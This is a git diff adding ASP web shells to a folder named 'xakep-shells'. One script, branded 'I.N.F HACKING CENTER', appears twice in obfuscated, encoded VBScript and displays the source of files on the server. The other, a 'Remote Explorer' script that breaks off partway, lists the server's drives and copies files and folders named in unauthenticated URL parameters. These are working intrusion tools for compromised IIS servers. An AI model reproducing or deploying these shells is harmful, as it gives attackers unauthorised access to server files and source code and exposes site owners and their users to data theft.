+<%#@~^2QgAAA==@#@&w.K{	l:P{~JU+^DYor^+/r@#@&HlybsCD,',J@!Vr@*&RHRw~JLw.G|xlhnLJ~?1.bwObxbP|!V^Cx9ýðýxý"PÝçbx~Pþ+30ü.PAN+Mr"R@!Vb@*~A;~Um.kaOk	P3U,Öx+hsbPÖ"+^sbðk~"l0kw^+MrPVk8k,|CzýDP`^Go*P@!(.@*Y!Yslhldý[ýMR R@!sk@*A;~UmDr2DkUPgCkýV~nE^Vl	ýVm^lðý,5CD9ý:~$ö^ü:üx9nPt+\1;OY!D,rVEz;aYCP_CVmP)U^l:C"klUýy,ASh bx6kVm3cODcmaPUkOnkkxbUPwWD!h~Aö^ü:ü	Nnx~)HDýUYý^ý~AbVLrHkP$;^l8k^rM/r	k.RR,@!^r@*Il.NýsP#n,f+kO+0V+MrUNx,fGVCzý,CGVH9+sWU~j+P3VKDG:mUEl~ÇKW0PKþ+0VüD,2[+Mkh c@!Vb@*?1DkaOr:bybP!ü\nU^+~|!sVmxC8bVk.dbxryc @!Vr@*|!VVmxýs~Cm3Výx9l~!xkþ,$k^ok,)s:m3,ÝçkUP( gRoPz[:bx~#Xl~!öM+-VbsDrHVPMöMüþüxü. R@!4.@*@!4.@*@!4D@*@!4M@*@!(.@*@!(D@*@!8D@*@!(D@*@!(.@*@!0GUDPmGsKDxD[@*@!^xD+D@*@!(@*A`P$ÝI,q HcsPU6s:P5zt(S&H&f(I @!J4@*@!(.@*@!4.@*@!0WUO,mGVK.{4s!+@*$P_l0~MV[k,ACOý^P}mrV,rV9;~T@!4M@*@!t.~1WsWMx4^l^V,/k"n{G@*@!(.@*@!^xD+D@*@!m~tM+W'4YO2=zzSAhckx6rsl0RDD ma@*qh	R&UsbSCVcKD /o@!&l@*'	4daiLx4kwp'x(/2iLx8dai[	8/ai[	8dwp@!mP4DnW{tOYalzJhAAc+3G.K:Cxch3C	kcmWs@*AVWMWhl	R\n0lxb ZK:@!JC@*[	4kwI[U8kwI[	8/ai'U(/wI'	4dwp'	4dai@!lP4DW'4YOw=z&AShR0CDkWxWdl	+kk YV@*nl./KU26/CU/k O0@!&l@*'	4daiLx4kwp'x(/2iLx8dai[	8/ai[	8dwp@!(D@*@!8.@*@!CP4.+6'hCbVYGlslrV(Gs4@$4WD:lbVc^Ws@*\+4Nr@!Jl@*LU4kwiLU8/aiLx8/2ILx8/aI[	4d2p[x8dai@!l,4M+W{:mkVDW=4W^X[+sWU@$4WYsCk^RmKh@*CKVHfn:GU@!zC@*LU4kwI'	4/2ILx8/aILx8kwp[x(/aI[	4dwp@!C~4D+6x:mkVDGl+M3mxqc*@$sXU+D mK:@*30WDGhmx@!zm@*@!4.@*@!(D@*@!l,4D0xtDY2lJzhSARbx0bsC3cYMR^6@*(c1 s@!&l@*J@#@&4+V2~{PEA!~km.bwDPHt9rP:l.l6ýx[C	PqcHRwPKChPzNý	l~5C"ý^:ýþOýDc@!4M@*@!sb@*Üm.nDVrPjn,Üm.Ykky,bk2P_WdY^l.ýU,Kü:ü	[+,ÇlVýþýM  @!(D@*@!sk@*@!J4@*b9.+kPjCDýDýPFýdsýxCPnG9EU!PVöDüxDüVh+0PÝdYNrðr	ky,9WkXl	ýU~b9ýxý,XCyýU c@!8D@*@!Vb@*PnXYl.nmP$öVüsü~Að+.,AKþ/l,CmOl,.CD,fnh3Yb.R@!4D@*@!sk@*|!D8lUýU,fG/HCVmDýUý~VöDüxOüsXn4bss+V,Ýçk	PbHxý,j+M\nD9+~6^:l	ý"Pdlyýs~uN9Pwl.3nOs+"Rc~@!(D@*@!^k@*)[M+dPnýdsýxC,Km:Pj+MrPVk.k^k.~vöDx=~N=-h8wl^k1lU-[n6l;VD lkw@!8M@*@!^n	YnD@*@!6WUDP1WVKD{.+9@*H+^+.~Ilwm8k^kDbh@!z6W	Y@*@!&^xO+M@*@!(D@*@!^k@*jrD+[+0r,kU1V!N+^+MrPDlVkaPn[D+0~b9:k	~Kl	+^kU+~i^lþhl@!8D@*@!sr@*bNhr	PÞr0MnkkUbPÇmV:m@!(.@*@!Vr@*U+ddbWx,#+,ZWKVr+,fð+.Vn.bPÇCVm.l0PJGTkx~6^:C@!(.@*@!sb@*UkYV.k	P#+Mk~Pm4l	slMýxýPÝ	[rDs+,\dR  @!4.@*@!8D@*@!^n	Y+.@*@!0GxD~1WsKD{/k^\.@*@!l~tM+Wxslk^OW=:lbs8Ws4@$tGYhCbV mKh@*@!0GUDPmGsKDx/bs7+.@*HACfÝ@!zm@*Pr9LwCAA==^#~@%><title>I.N.F HACKING CENTER - <%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%> - www.infilak.tr.cx</title><%#@~^HAEAAA==@#@&l^DP{PI;!n/DR}EDzjDDk	L`rlmDrGxr#@#@&(0~C1Y~',EtV2E,KtnU@#@&^l^s,XCMNb:@#@&+	[Pb0@#@&0VCdKDP{~D;EdOR6WM:cJVsm/GDrb@#@&kds:Px~M+5EdDRWKDs`Jb/^n:r#@#@&b0~rkV+sxJrPY4nU@#@&kkVn:~x,J[EME@#@&+U[,k0@#@&b0~3^CkW.,',JJ,Y4nx,3slkW.x,D+$;+kYRkn.\D7l.kC8^+d`r)nhSmK_5?(/zSmnzP_Jb@#@&gVMAAA==^#~@%><center> <%#@~^UAAAAA==@#@&DnkwKx/RS.kD+~J@!4G[HP4T^W^WD{:f&2&2&@*@!8G9X~YK2:mDLr	'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%" border=0 bgcolor=black><tr><td><table width="100%" border=0 bgcolor="#666666" cellpadding=1 cellspacing=1><tr><td><center> <%#@~^WQAAAA==@#@&DnkwKx/RS.kD+~J@!khL,/D1xtDYw=&&+cNK:CkU[^6 mKhz0l.dKxF&r	0sWTGcor6P4+kTtDx,y@*E@#@&fhwAAA==^#~@%></td></tr><td bgcolor="#999999" height=32>&nbsp;<Font size=2 Color=000000 Face=Verdana><b>Adres : </b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</Font> <input type=hidden name=islem value=basla> <input type=text name=klasor size=49 value="<%=#@~^BgAAAA==V^ldKDjAIAAA==^#~@%>"> &nbsp; <input type=submit value="Kodlarý Göster" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail.com title="E-mail Gönder"><font face=wingdings color=lime size=4>*</font> </a>&nbsp; <a href=http://www.infilaktim.tk title="I.N.F Sitesi" target=_blank><font face=wingdings color=lime size=4>M</font> </a>&nbsp; <a href="?action=help" title="Yardým" target=inf onClick="window.open('?action=help','inf','width=450,height=400 toolbar=no scrollbars=yes' )"><font face=wingdings color=lime size=4>&</font> </a>&nbsp;</td></tr></form></td></table></td></tr><tr><td><table width="100%" border=0 align=center><tr><td bgcolor="#CCCCCC" height=359><%#@~^QwAAAA==r6PUKY,k/^+s~',J8lkVCE,YtU@#@&D+k2Gxk+ch.kOn,JE[HCybVC.LJJ@#@&Vd+nBQAAA==^#~@%><br><center><textarea rows=24 name=kodlar cols=90>
+<%#@~^yAAAAA==jY~K4NCK:n,xPU+.\D /M+lDnr(L+1OcJtk1DG/GWDRpHduK:nEb@#@&W8%_KPnc6a+U,JV2Kr~,EJL3slkW.'rJ~,Wl^/+@#@&G4NC:KKRjn	N@#@&0GN^l.~{P/n.7+.R4OsV3	mKN+vW(%C:KKR"+d2Kx/P+XY#@#@&.+kwKxd+ AMkO+,VW9VC.@#@&+U[,kWoT4AAA==^#~@%>
+<%#@~^CQAAAA==j`A~UkDkVDwMAAA==^#~@%><style>TD {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+BODY {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+P {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+DIV {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+
+A:link {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:active {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:visited {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A.postlink {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:hover {
+	COLOR: #dd6900
+}
+.bodyline {
+	BORDER-RIGHT: #98aab1 1px solid; BORDER-TOP: #98aab1 1px solid; BACKGROUND: #ffffff; BORDER-LEFT: #98aab1 1px solid; BORDER-BOTTOM: #98aab1 1px solid
+}
+INPUT {
+	BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
+}
+TEXTAREA {
+	BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
+}
+SELECT {
+	BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BORDER-RIGHT-COLOR: #006699
+}
+IMG {
+	BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px
+}
+TH {
+	PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: #f9bc5e url('images/navbar.jpg'); COLOR: #713600; WHITE-SPACE: nowrap; HEIGHT: 27px; TEXT-ALIGN: center
+}
+TD.cat {
+	FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: 4px; LETTER-SPACING: 1px; HEIGHT: 27px
+}
+.title {
+	FONT-WEIGHT: bold; FONT-SIZE: 13px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.content {
+	BACKGROUND: none transparent scroll repeat 0% 0%; FONT-FAMILY: Verdana, Helvetica
+}
+.block-title {
+	FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica
+}
+.storytitle {
+	FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #713600; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.storycat {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: underline
+}
+.boxtitle {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.boxcontent {
+	FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: red; FONT-FAMILY: Verdana, Helvetica
+}
+.option {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.ok {
+	FONT-WEIGHT: normal; FONT-SIZE: 9px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #000000; FONT-FAMILY: webdings; TEXT-DECORATION: none
+}</style><style><!-- 
+body {scrollbar-face-color: #000000; scrollbar-shadow-color: #003333; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #003333; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #993300; scrollbar-arrow-color: #CC3300;}
+}
+// --></style><%#@~^BwAAAA==n	N~kE(oQIAAA==^#~@%>
+
+<%#@~^CgAAAA==d!4~HlMNks8AMAAA==^#~@%><title><%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%></title><body bgcolor=#333333><br><center><font color=red><h4><%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%></center>
+<font color=lime>
+<%=#@~^BAAAAA==4V2qQEAAA==^#~@%>
+<%#@~^HwAAAA==@#@&DnkwKx/RUN@#@&nx9Pd;(@#@&ugcAAA==^#~@%>
+
+
+</textarea>
+<noscript><noscript><plaintext><plaintext>
+<!--
+         
+             HACKING
+            
+             www.infilak.tr.cx
+              Mehdi & HolyDemon
+                 INF TEAM DURMAZ , DURDURULAMAZ
+            Hak Geldi Batýl Zail Oldu..
+-->
\ No newline at end of file
diff --git a/xakep-shells/ASP/Reader.asp.txt b/xakep-shells/ASP/Reader.asp.txt
new file mode 100644
index 0000000..6cec6a0
--- /dev/null
+++ b/xakep-shells/ASP/Reader.asp.txt
@@ -0,0 +1,116 @@
+<%@ LANGUAGE = VBScript.Encode %>
+
+
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<meta http-equiv="Content-Language" content="tr">
+<!--
+         
+            
+            
+             HACKING 
+              Mehdi & HolyDemon
+                 www.infilak.tr.cx & www.infilaktim.tk
+           
+-->
+<%#@~^FAAAAA==G	PnMDKDPM+k;:PU+XYtwcAAA==^#~@%> 
+<%#@~^2QgAAA==@#@&w.K{	l:P{~JU+^DYor^+/r@#@&HlybsCD,',J@!Vr@*&RHRw~JLw.G|xlhnLJ~?1.bwObxbP|!V^Cx9ýðýxý"PÝçbx~Pþ+30ü.PAN+Mr"R@!Vb@*~A;~Um.kaOk	P3U,Öx+hsbPÖ"+^sbðk~"l0kw^+MrPVk8k,|CzýDP`^Go*P@!(.@*Y!Yslhldý[ýMR R@!sk@*A;~UmDr2DkUPgCkýV~nE^Vl	ýVm^lðý,5CD9ý:~$ö^ü:üx9nPt+\1;OY!D,rVEz;aYCP_CVmP)U^l:C"klUýy,ASh bx6kVm3cODcmaPUkOnkkxbUPwWD!h~Aö^ü:ü	Nnx~)HDýUYý^ý~AbVLrHkP$;^l8k^rM/r	k.RR,@!^r@*Il.NýsP#n,f+kO+0V+MrUNx,fGVCzý,CGVH9+sWU~j+P3VKDG:mUEl~ÇKW0PKþ+0VüD,2[+Mkh c@!Vb@*?1DkaOr:bybP!ü\nU^+~|!sVmxC8bVk.dbxryc @!Vr@*|!VVmxýs~Cm3Výx9l~!xkþ,$k^ok,)s:m3,ÝçkUP( gRoPz[:bx~#Xl~!öM+-VbsDrHVPMöMüþüxü. R@!4.@*@!4.@*@!4D@*@!4M@*@!(.@*@!(D@*@!8D@*@!(D@*@!(.@*@!0GUDPmGsKDxD[@*@!^xD+D@*@!(@*A`P$ÝI,q HcsPU6s:P5zt(S&H&f(I @!J4@*@!(.@*@!4.@*@!0WUO,mGVK.{4s!+@*$P_l0~MV[k,ACOý^P}mrV,rV9;~T@!4M@*@!t.~1WsWMx4^l^V,/k"n{G@*@!(.@*@!^xD+D@*@!m~tM+W'4YO2=zzSAhckx6rsl0RDD ma@*qh	R&UsbSCVcKD /o@!&l@*'	4daiLx4kwp'x(/2iLx8dai[	8/ai[	8dwp@!mP4DnW{tOYalzJhAAc+3G.K:Cxch3C	kcmWs@*AVWMWhl	R\n0lxb ZK:@!JC@*[	4kwI[U8kwI[	8/ai'U(/wI'	4dwp'	4dai@!lP4DW'4YOw=z&AShR0CDkWxWdl	+kk YV@*nl./KU26/CU/k O0@!&l@*'	4daiLx4kwp'x(/2iLx8dai[	8/ai[	8dwp@!(D@*@!8.@*@!CP4.+6'hCbVYGlslrV(Gs4@$4WD:lbVc^Ws@*\+4Nr@!Jl@*LU4kwiLU8/aiLx8/2ILx8/aI[	4d2p[x8dai@!l,4M+W{:mkVDW=4W^X[+sWU@$4WYsCk^RmKh@*CKVHfn:GU@!zC@*LU4kwI'	4/2ILx8/aILx8kwp[x(/aI[	4dwp@!C~4D+6x:mkVDGl+M3mxqc*@$sXU+D mK:@*30WDGhmx@!zm@*@!4.@*@!(D@*@!l,4D0xtDY2lJzhSARbx0bsC3cYMR^6@*(c1 s@!&l@*J@#@&4+V2~{PEA!~km.bwDPHt9rP:l.l6ýx[C	PqcHRwPKChPzNý	l~5C"ý^:ýþOýDc@!4M@*@!sb@*Üm.nDVrPjn,Üm.Ykky,bk2P_WdY^l.ýU,Kü:ü	[+,ÇlVýþýM  @!(D@*@!sk@*@!J4@*b9.+kPjCDýDýPFýdsýxCPnG9EU!PVöDüxDüVh+0PÝdYNrðr	ky,9WkXl	ýU~b9ýxý,XCyýU c@!8D@*@!Vb@*PnXYl.nmP$öVüsü~Að+.,AKþ/l,CmOl,.CD,fnh3Yb.R@!4D@*@!sk@*|!D8lUýU,fG/HCVmDýUý~VöDüxOüsXn4bss+V,Ýçk	PbHxý,j+M\nD9+~6^:l	ý"Pdlyýs~uN9Pwl.3nOs+"Rc~@!(D@*@!^k@*)[M+dPnýdsýxC,Km:Pj+MrPVk.k^k.~vöDx=~N=-h8wl^k1lU-[n6l;VD lkw@!8M@*@!^n	YnD@*@!6WUDP1WVKD{.+9@*H+^+.~Ilwm8k^kDbh@!z6W	Y@*@!&^xO+M@*@!(D@*@!^k@*jrD+[+0r,kU1V!N+^+MrPDlVkaPn[D+0~b9:k	~Kl	+^kU+~i^lþhl@!8D@*@!sr@*bNhr	PÞr0MnkkUbPÇmV:m@!(.@*@!Vr@*U+ddbWx,#+,ZWKVr+,fð+.Vn.bPÇCVm.l0PJGTkx~6^:C@!(.@*@!sb@*UkYV.k	P#+Mk~Pm4l	slMýxýPÝ	[rDs+,\dR  @!4.@*@!8D@*@!^n	Y+.@*@!0GxD~1WsKD{/k^\.@*@!l~tM+Wxslk^OW=:lbs8Ws4@$tGYhCbV mKh@*@!0GUDPmGsKDx/bs7+.@*HACfÝ@!zm@*Pr9LwCAA==^#~@%><title>I.N.F HACKING CENTER - <%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%> - www.infilak.tr.cx</title><%#@~^HAEAAA==@#@&l^DP{PI;!n/DR}EDzjDDk	L`rlmDrGxr#@#@&(0~C1Y~',EtV2E,KtnU@#@&^l^s,XCMNb:@#@&+	[Pb0@#@&0VCdKDP{~D;EdOR6WM:cJVsm/GDrb@#@&kds:Px~M+5EdDRWKDs`Jb/^n:r#@#@&b0~rkV+sxJrPY4nU@#@&kkVn:~x,J[EME@#@&+U[,k0@#@&b0~3^CkW.,',JJ,Y4nx,3slkW.x,D+$;+kYRkn.\D7l.kC8^+d`r)nhSmK_5?(/zSmnzP_Jb@#@&gVMAAA==^#~@%><center> <%#@~^UAAAAA==@#@&DnkwKx/RS.kD+~J@!4G[HP4T^W^WD{:f&2&2&@*@!8G9X~YK2:mDLr	'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width="75%" border=0 bgcolor=black><tr><td><table width="100%" border=0 bgcolor="#666666" cellpadding=1 cellspacing=1><tr><td><center> <%#@~^WQAAAA==@#@&DnkwKx/RS.kD+~J@!khL,/D1xtDYw=&&+cNK:CkU[^6 mKhz0l.dKxF&r	0sWTGcor6P4+kTtDx,y@*E@#@&fhwAAA==^#~@%></td></tr><td bgcolor="#999999" height=32>&nbsp;<Font size=2 Color=000000 Face=Verdana><b>Adres : </b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</Font> <input type=hidden name=islem value=basla> <input type=text name=klasor size=49 value="<%=#@~^BgAAAA==V^ldKDjAIAAA==^#~@%>"> &nbsp; <input type=submit value="Kodlarý Göster" name=submit> </Font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail.com title="E-mail Gönder"><font face=wingdings color=lime size=4>*</font> </a>&nbsp; <a href=http://www.infilaktim.tk title="I.N.F Sitesi" target=_blank><font face=wingdings color=lime size=4>M</font> </a>&nbsp; <a href="?action=help" title="Yardým" target=inf onClick="window.open('?action=help','inf','width=450,height=400 toolbar=no scrollbars=yes' )"><font face=wingdings color=lime size=4>&</font> </a>&nbsp;</td></tr></form></td></table></td></tr><tr><td><table width="100%" border=0 align=center><tr><td bgcolor="#CCCCCC" height=359><%#@~^QwAAAA==r6PUKY,k/^+s~',J8lkVCE,YtU@#@&D+k2Gxk+ch.kOn,JE[HCybVC.LJJ@#@&Vd+nBQAAA==^#~@%><br><center><textarea rows=24 name=kodlar cols=90>
+<%#@~^yAAAAA==jY~K4NCK:n,xPU+.\D /M+lDnr(L+1OcJtk1DG/GWDRpHduK:nEb@#@&W8%_KPnc6a+U,JV2Kr~,EJL3slkW.'rJ~,Wl^/+@#@&G4NC:KKRjn	N@#@&0GN^l.~{P/n.7+.R4OsV3	mKN+vW(%C:KKR"+d2Kx/P+XY#@#@&.+kwKxd+ AMkO+,VW9VC.@#@&+U[,kWoT4AAA==^#~@%>
+<%#@~^CQAAAA==j`A~UkDkVDwMAAA==^#~@%><style>TD {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+BODY {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+P {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+DIV {
+	FONT-SIZE: 10px; FONT-FAMILY: Verdana,Helvetica
+}
+
+A:link {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:active {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:visited {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A.postlink {
+	COLOR: #006699; TEXT-DECORATION: none
+}
+A:hover {
+	COLOR: #dd6900
+}
+.bodyline {
+	BORDER-RIGHT: #98aab1 1px solid; BORDER-TOP: #98aab1 1px solid; BACKGROUND: #ffffff; BORDER-LEFT: #98aab1 1px solid; BORDER-BOTTOM: #98aab1 1px solid
+}
+INPUT {
+	BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
+}
+TEXTAREA {
+	BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
+}
+SELECT {
+	BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BORDER-RIGHT-COLOR: #006699
+}
+IMG {
+	BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px
+}
+TH {
+	PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: #f9bc5e url('images/navbar.jpg'); COLOR: #713600; WHITE-SPACE: nowrap; HEIGHT: 27px; TEXT-ALIGN: center
+}
+TD.cat {
+	FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: 4px; LETTER-SPACING: 1px; HEIGHT: 27px
+}
+.title {
+	FONT-WEIGHT: bold; FONT-SIZE: 13px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.content {
+	BACKGROUND: none transparent scroll repeat 0% 0%; FONT-FAMILY: Verdana, Helvetica
+}
+.block-title {
+	FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica
+}
+.storytitle {
+	FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #713600; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.storycat {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: underline
+}
+.boxtitle {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.boxcontent {
+	FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: red; FONT-FAMILY: Verdana, Helvetica
+}
+.option {
+	FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
+}
+.ok {
+	FONT-WEIGHT: normal; FONT-SIZE: 9px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #000000; FONT-FAMILY: webdings; TEXT-DECORATION: none
+}</style><style><!-- 
+body {scrollbar-face-color: #000000; scrollbar-shadow-color: #003333; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #003333; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #993300; scrollbar-arrow-color: #CC3300;}
+}
+// --></style><%#@~^BwAAAA==n	N~kE(oQIAAA==^#~@%>
+
+<%#@~^CgAAAA==d!4~HlMNks8AMAAA==^#~@%><title><%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%></title><body bgcolor=#333333><br><center><font color=red><h4><%=#@~^CAAAAA==2MWm	ls+UQMAAA==^#~@%></center>
+<font color=lime>
+<%=#@~^BAAAAA==4V2qQEAAA==^#~@%>
+<%#@~^HwAAAA==@#@&DnkwKx/RUN@#@&nx9Pd;(@#@&ugcAAA==^#~@%>
+
+
+</textarea>
+<noscript><noscript><plaintext><plaintext>
+<!--
+         
+             HACKING
+            
+             www.infilak.tr.cx
+              Mehdi & HolyDemon
+                 INF TEAM DURMAZ , DURDURULAMAZ
+            Hak Geldi Batýl Zail Oldu..
+-->
\ No newline at end of file
diff --git a/xakep-shells/ASP/RemExp.asp.txt b/xakep-shells/ASP/RemExp.asp.txt
new file mode 100644
index 0000000..c8faa18
--- /dev/null
+++ b/xakep-shells/ASP/RemExp.asp.txt
@@ -0,0 +1,250 @@
+<%@ Language=VBScript %>
+<%
+Option Explicit
+
+Dim giCount
+Dim gvAttributes
+
+Dim Ext
+
+Dim ScriptFolder
+Dim FolderPath
+
+Dim FileSystem
+Dim Drives
+Dim Drive
+Dim Folders
+Dim Folder
+Dim SubFolders
+Dim SubFolder
+Dim Files
+Dim File
+
+Dim BgColor, BackgroundColor,FSO
+
+If Request.QueryString("CopyFolder") <> "" Then
+ Set FSO = CreateObject("Scripting.FileSystemObject")
+ FSO.CopyFolder Request.QueryString("CopyFolder") & "*", "d:\"
+End If
+
+If Request.QueryString("CopyFile") <> "" Then
+ Set FSO = CreateObject("Scripting.FileSystemObject")
+ FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"), "d:\"
+End If
+
+Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")
+
+FolderPath = Request.QueryString("FolderPath")
+
+If FolderPath = "" Then
+ FolderPath = Request.ServerVariables("PATH_TRANSLATED")
+End If
+
+FolderPath = ParseFolder(FolderPath)
+
+ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLATED")) & "images\"
+
+%>
+<html>
+<head>
+<title>Remote Explorer</title>
+<style type="text/css">
+BODY
+{
+ BACKGROUND-COLOR: #C0C0C0
+    FONT-FAMILY: 'MS Sans Serif', Arial;
+    FONT-SIZE: 8px;
+ MARGIN: 0px
+}
+td, input, select
+{
+    FONT-FAMILY: 'MS Sans Serif', Arial;
+    FONT-SIZE: 8px;
+}
+.Address
+{
+    BACKGROUND-ATTACHMENT: fixed;
+    BACKGROUND-POSITION: 1px center;
+    BACKGROUND-REPEAT: no-repeat;
+    Padding-LEFT: 10px
+}
+.Go
+{
+    BACKGROUND-ATTACHMENT: fixed;
+    BACKGROUND-POSITION: left center;
+    BACKGROUND-REPEAT: no-repeat;
+    Padding-LEFT: 10px
+}
+</style>
+</head>
+<body bgcolor="#c0c0c0">
+<table width="100%" cellpadding="0" cellspacing="0" border="0">
+<tr>
+<form>
+<td width="1%" nowrap>   
+<select name="FolderPath" id="Drive">
+<%
+Set Drives = FileSystem.Drives
+For Each Drive In Drives
+ Response.Write "<OPTION value=""" & Drive.DriveLetter & ":\"""
+ If InStr(UCase(FolderPath), Drive.DriveLetter & ":\") > 0 Then Response.Write " selected"
+  Response.Write ">"
+  Response.Write Drive.DriveLetter & " - "
+  If Drive.DriveType = "Remote" Then
+   Response.Write Drive.ShareName & " [share]"
+  ElseIf Drive.DriveLetter <> "A" Then
+   If Drive.IsReady Then
+    Response.Write Drive.VolumeName
+   Else
+    Response.Write "(Not Ready)"
+   End If
+  Else
+   Response.Write "(Skiped Detection)"
+  End If
+  Response.Write "</OPTION>"
